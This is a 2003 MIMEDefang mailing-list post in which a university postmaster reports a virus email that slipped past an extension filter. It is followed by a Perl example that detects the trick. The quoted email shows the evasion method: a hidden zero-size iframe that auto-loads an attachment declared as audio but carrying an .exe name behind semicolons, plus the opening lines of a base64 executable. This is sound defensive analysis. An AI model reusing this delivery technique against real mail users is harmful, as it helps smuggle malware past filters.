[Mimedefang] odd filename
Joseph Brennan
brennan at columbia.edu
Tue Jul 1 12:43:00 EDT 2003
Interesting example below. This familiar virusmail gets past
Mimedefang's usual $bad_exts check as in the suggested minimum
filter. In fact I have a specific test to toss these things out
quickly without further analysis, that should have caught this
as it does hundreds of others a day:
    # Fast path: bounce anything with a bad filename declared as audio
    if (filter_bad_filename($entity)) {
        if ($type =~ /audio/) {
            md_log('bad_filename', $fname, $type);
            return action_bounce("Bad audio attachment");
        }
    }
The name= value in the second part looks odd to me.
There is also a third part with the same name= value, which has
a .htm extension. My client (Mulberry) does not render it into
text so I don't know what it says if anything.
Joseph Brennan Columbia University in the City of New York
postmaster at columbia.edu Academic Technologies Group
From: TDOCwebmaster <TDOCwebmaster at mail.state.tn.us>
To: brennan at columbia.edu
Subject: A very new website
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary=M8Wq579211
Message-Id: <E19VfId-0001zw-00 at falcon.mail.pas.earthlink.net>
Date: Thu, 26 Jun 2003 15:33:04 -0700
X-Scanned-By: MIMEDefang 2.32 (www . roaringpenguin . com / mimedefang)
--M8Wq579211
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Xk3I2085ut096866 height=3D0 width=3D0>
</iframe>
<FONT>Hello,This is a new website<br>
I wish you would like it.</FONT></BODY></HTML>
--M8Wq579211
Content-Type: audio/x-wav;
        name=search_spanel;kw=;sz=120x60;tile=1;ord=10477246[1].exe
Content-Transfer-Encoding: base64
Content-ID: <Xk3I2085ut096866>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
... much stuff deleted ...
--M8Wq579211
Content-Type: application/octet-stream;
        name=search_spanel;kw=;sz=120x60;tile=1;ord=10477246[1].htm
Content-Transfer-Encoding: base64
Content-ID: <Xk3I2085ut096866>
--M8Wq579211--
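
An added example, not part of the original post and not MIMEDefang code: in MIME header syntax an unquoted parameter value ends at the first `;`, so a parser that follows that rule reads the name in the second part as `search_spanel` with no extension, while a reader that takes the rest of the line sees a name ending in `.exe`. The helper names and the extension list are assumptions; the header string is constructed from the sample message.

```perl
#!/usr/bin/perl
# Added example: compare a strict and a lenient reading of the name=
# parameter in a Content-Type header and test both for a bad extension.
# Helper names and the extension list are assumptions for illustration.
use strict;
use warnings;

# Constructed from the second part of the sample message (header unfolded).
my $header = 'audio/x-wav; name=search_spanel;kw=;sz=120x60;tile=1;ord=10477246[1].exe';

my $BAD_EXT = qr/\.(?:exe|scr|pif|bat|com|vbs)\s*$/i;    # assumed short list

# Strict reading: a quoted value runs to the closing quote; an unquoted
# value is a token and stops at whitespace or any tspecial such as ';'.
sub strict_name {
    my ($h) = @_;
    return $1 if $h =~ /;\s*name\s*=\s*"((?:[^"\\]|\\.)*)"/i;
    return $1 if $h =~ /;\s*name\s*=\s*([^\s()<>@,;:\\"\/\[\]?=]*)/i;
    return undef;
}

# Lenient reading: for an unquoted value, everything after name= up to the
# end of the header. A quoted value is unambiguous, so reuse the strict one.
sub lenient_name {
    my ($h) = @_;
    return strict_name($h) if $h =~ /;\s*name\s*=\s*"/i;
    return $h =~ /;\s*name\s*=\s*(.*?)\s*$/is ? $1 : undef;
}

# Return a reason string if either reading ends in a bad extension,
# otherwise undef.
sub suspicious_name {
    my ($h) = @_;
    my ($s, $l) = (strict_name($h), lenient_name($h));
    return "bad extension: $s" if defined $s && $s =~ $BAD_EXT;
    return "bad extension in lenient reading: $l" if defined $l && $l =~ $BAD_EXT;
    return undef;
}

printf "strict  = %s\n", strict_name($header)     // '(none)';
printf "lenient = %s\n", lenient_name($header)    // '(none)';
printf "verdict = %s\n", suspicious_name($header) // 'ok';
```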